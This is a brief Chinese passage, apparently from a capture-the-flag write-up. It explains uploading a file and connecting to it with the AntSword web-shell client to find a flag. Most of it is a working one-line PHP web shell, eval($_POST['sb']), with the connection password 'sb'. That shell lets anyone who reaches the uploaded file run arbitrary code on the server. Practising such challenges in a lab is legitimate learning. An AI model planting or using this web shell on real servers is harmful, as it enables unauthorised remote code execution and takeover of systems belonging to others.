随便上传个木马, <?php eval($_POST["sb"]); phpinfo(); ?> 然后用蚁剑配置如下连接密码是sb,因为我已经在小牛马.php中post了。 然后再查看文件,找到flag。